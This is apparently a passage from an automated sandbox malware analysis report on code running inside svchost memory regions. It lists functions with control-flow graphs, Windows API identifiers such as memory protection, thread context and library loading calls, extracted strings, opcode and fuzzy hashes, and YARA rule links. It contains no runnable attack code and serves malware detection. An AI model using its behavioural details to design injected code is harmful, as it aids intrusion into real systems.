                                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction ID: fa66f7741ebcd80bb86e54b7b1d1724f64a0d38ed48e78e569a20c50e363ff0f
                                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction Fuzzy Hash: 46E1E572648F40CAEB6ADF65E84B39D77A0F748B99F100155EE8957B95CF34C081C714
                                                                          Function 00000257E1079944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 465 257e1079944-257e10799ac call 257e107a814 468 257e1079e13-257e1079e1b call 257e107bb48 465->468 469 257e10799b2-257e10799b5 465->469 469->468 470 257e10799bb-257e10799c1 469->470 472 257e10799c7-257e10799cb 470->472 473 257e1079a90-257e1079aa2 470->473 472->473 477 257e10799d1-257e10799dc 472->477 475 257e1079aa8-257e1079aac 473->475 476 257e1079d63-257e1079d67 473->476 475->476 480 257e1079ab2-257e1079abd 475->480 478 257e1079d69-257e1079d70 476->478 479 257e1079da0-257e1079daa call 257e1078a34 476->479 477->473 481 257e10799e2-257e10799e7 477->481 478->468 482 257e1079d76-257e1079d9b call 257e1079e1c 478->482 479->468 491 257e1079dac-257e1079dcb call 257e1076d40 479->491 480->476 484 257e1079ac3-257e1079aca 480->484 481->473 485 257e10799ed-257e10799f7 call 257e1078a34 481->485 482->479 488 257e1079c94-257e1079ca0 484->488 489 257e1079ad0-257e1079b07 call 257e1078e10 484->489 485->491 499 257e10799fd-257e1079a28 call 257e1078a34 * 2 call 257e1079124 485->499 488->479 492 257e1079ca6-257e1079caa 488->492 489->488 504 257e1079b0d-257e1079b15 489->504 496 257e1079cac-257e1079cb8 call 257e10790e4 492->496 497 257e1079cba-257e1079cc2 492->497 496->497 513 257e1079cdb-257e1079ce3 496->513 497->479 503 257e1079cc8-257e1079cd5 call 257e1078cb4 497->503 533 257e1079a2a-257e1079a2e 499->533 534 257e1079a48-257e1079a52 call 257e1078a34 499->534 503->479 503->513 505 257e1079b19-257e1079b4b 504->505 510 257e1079c87-257e1079c8e 505->510 511 257e1079b51-257e1079b5c 505->511 510->488 510->505 511->510 514 257e1079b62-257e1079b7b 511->514 515 257e1079ce9-257e1079ced 513->515 516 257e1079df6-257e1079e12 call 257e1078a34 * 2 call 257e107baa8 513->516 518 257e1079c74-257e1079c79 514->518 519 257e1079b81-257e1079bc6 call 257e10790f8 * 2 514->519 520 257e1079d00 515->520 521 257e1079cef-257e1079cfe call 257e10790e4 515->521 516->468 524 257e1079c84 518->524 546 257e1079bc8-257e1079bee call 257e10790f8 call 257e107a038 519->546 547 257e1079c04-257e1079c0a 519->547 529 257e1079d03-257e1079d0d call 257e107a8ac 520->529 521->529 524->510 529->479 544 257e1079d13-257e1079d61 call 257e1078d44 call 257e1078f50 529->544 533->534 538 257e1079a30-257e1079a3b 533->538 534->473 550 257e1079a54-257e1079a74 call 257e1078a34 * 2 call 257e107a8ac 534->550 538->534 543 257e1079a3d-257e1079a42 538->543 543->468 543->534 544->479 566 257e1079c15-257e1079c72 call 257e1079870 546->566 567 257e1079bf0-257e1079c02 546->567 554 257e1079c0c-257e1079c10 547->554 555 257e1079c7b 547->555 571 257e1079a8b 550->571 572 257e1079a76-257e1079a80 call 257e107a99c 550->572 554->519 556 257e1079c80 555->556 556->524 566->556 567->546 567->547 571->473 575 257e1079a86-257e1079def call 257e10786ac call 257e107a3f4 call 257e10788a0 572->575 576 257e1079df0-257e1079df5 call 257e107baa8 572->576 575->576 576->516
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: eee8ddbebd137ff77ed4dfc8451c6d54f91bdde69a51e284d5195fa703101059
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: FFE1E472648F408AEB6AFF65E88B3AD37B0F7457A9F000156EE4A57B55CB34C490C704
                                                                          Function 00000257E10AF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction ID: cf054b1d2baf678fe8bdec6d8eaa147d53923dc8430d7e3ded5bb42e28665e5b
                                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction Fuzzy Hash: 2741C632399F0091FA1FDB16BC0B79A2391B745BE1F5942659D1E87784EF3CC4458328
                                                                          Function 00000257E10A104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: 9cf63d37dc8258112caa738864d3c548755d6f27b2a305309498d83b3183a8b3
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: 27419F73218F84C6E765CF21F84A79E77A1F388B89F048129EA8907B58DF38D449CB14
                                                                          Function 00000257E10AD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD087
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: 3937cb81b8b0f971906db0413d64368154e2d1c9df82cae5cad0a14440eaf12d
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: C2118E707CCB8041FA6EA7357D5F36D71416B483F2F2443A4B93A066EADE78D4028728
                                                                          Function 00000257E10A7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 1fcdb397b1644b17d16c1eb1e9d437d376732d2965c1ff5ed4ddc4445df92217
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 168117317CCF4186FB5FAB65BC4B39926D0BB89782F44C4A5DA0447396FB3AC4458728
                                                                          Function 00000257E10A9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction ID: 1ca0844d76c3e8bd01ab4792baa35eba0e52544e90a3a5dfd8280d08fd67e20c
                                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction Fuzzy Hash: CB31F63139AF00E1EE1BDB02BC0BB5523D4B748BA2F5905659E2F4B792DF38C0458328
                                                                          Function 00000257E10B3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction ID: 9ee7c4574fcb2fd013fb964aa6248de50fe65bdbb00ad364504beb63cc9ade48
                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction Fuzzy Hash: 3111BF31358F4086E756CB12FC4BB1972A4F388FE6F180265EA2A87794CF38C8148748
                                                                          Function 00000257E10A3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: 9a2b3325603176c98f4169559021404f9569204c8e58316270e8b4dcf71a70dc
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: 60118B36348F4086EF199B22F80E76A62B4FB88B86F040468DE990B794EF3DC545C718
                                                                          Function 00000257E10A5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID:
                                                                          • API String ID: 1666949209-0
                                                                          • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction ID: 966c8cfc9cd363fdfda02b2bdcc18e9b8abbeec9a729aea55c5a0fc7a420839d
                                                                          • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction Fuzzy Hash: E6D1C976248F88C1DA75DB0AF89A35A77A0F388B85F104252EACD47BA9DF3CC551CB14
                                                                          Function 00000257E10A2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction ID: cdb653347486f95d6936b3a6e080e65dbc29c48c69199ff8dba1e233120f6aa2
                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction Fuzzy Hash: CF31D232389F5186EA1ACF16FD4BB69A7A4FB44B86F084170AE4847B55EF34C4A18314
                                                                          Function 00000257E10ACFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction ID: bbc7888f5e4037d8188519172c2121bad00389fe15c94999cae900f3cde1423e
                                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction Fuzzy Hash: A4114D703C8F8081FA6E97317E4F76D21516B487E2F1447A4B936466E6DE78C4018728
                                                                          Function 00000257E10A199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction ID: 4c54e0cd68b01bb03e9099f5d5445d1d048295c9e60c374dc5866ed19de68462
                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction Fuzzy Hash: 48015731348F4082EA19DB52B89AB5A63A5F788FC2F888475DE5A43754DE38C989C704
                                                                          Function 00000257E10A36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction ID: f5791e389f93502f4c9fee8c8b73c305a7e67720a75c226d159784ea1be0102c
                                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction Fuzzy Hash: 47011775259F4086EB2ADB22FC1F71A66B0BB99B87F0404A4DA5907764EF3DC148CB18
                                                                          Function 00000257E10A9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: dfda00a6953bd7fd31afee440e3a8cdc3f116b40ca32194e381a607924f2b4fb
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: 4C51A132749B008AEB1EDB25FC4FB593796F344B89F1081A8DA1747788EB75E981C718
                                                                          Function 00000257E10A8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: 7996f0918551bbe49c81effb0a51052158cdeed2e265b154e812129fb940380b
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: 7A317832388B409AE71ADB21FC4BB5937A5F340B8AF158158AE5747789DB39D980C718
                                                                          Function 00000257E10A1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: d56e8e4ea1c63715ed7fae816492958a322087c5f1097162d2259ce4f6dc8c21
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: C2F06272348F4192EB65CF21FCDAB5A67A1F758BCAF848060DA4946954DF3CC68DCB04
                                                                          Function 00000257E10ABC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction ID: a1c3fc9fb2c424eb5cf16538e388777059fc8f0e0a0ae8e1d12dd053b8120eaf
                                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction Fuzzy Hash: D9F06271359F0481EB1ACB29FC4FB6A6321FB88BA2F540299DA6A461E4DF3CC4448354
                                                                          Function 00000257E10A3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction ID: 6788c6199675c10edf7c539ab1b1bd7f0a961ca82cbb9ee56a1611471c4650f0
                                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction Fuzzy Hash: E1F08C2038DF8482EA49CF13BD1F619A260AB48FC2F0880B0EE6A07B18DF3CC4458708
                                                                          Function 00000257E10A50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction ID: 3bab7aea2da97d2c89cf869e435822f7947a441c0eb5686131a233f6f073e29f
                                                                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction Fuzzy Hash: 8702F67225DB8086EBA5CB59F89635AB7A0F3C4785F104055EA8E87BA8DF7CC484CF14
                                                                          Function 00000257E10A5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction ID: 7c0b0c8c25f7da43d0dd52c625788ab6d70cb4887c3805681c3f7a601031dd5b
                                                                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction Fuzzy Hash: E261C77655DF40C6E76A8B1AF84A31AB7E0F388785F100155EA8E47BA8DB7CC444CF18
                                                                          Function 00000257E10B4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 9bd224d7f8937e48dcb23c6a92691f7b715b7476c5eb2bebaeb9097fbf750117
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 3011A722FDCF5021F66E9568FC5FB6911406B783B6F180EA4A577876D6CA34CB41811C
                                                                          Function 00000257E1083504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: a39f79cb811ea4c1becf5d789feaa45f4274d3385c809976c6f2e92f2461cad1
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: B911A7226DCF1119FA5E1529FC4F3693180EBD9376F4846B8A9660EFDACA78C8414228
                                                                          Function 00000257E107F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: 8e9c97b707987eaf443330098e57a4151393cd7d99a53dd1af56ba60a02a01f1
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: 7561D63268CF4042F66FFB69FD4F3B966A1F782742F514495DA2A07795DB34C8428308
                                                                          Function 00000257E10AAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
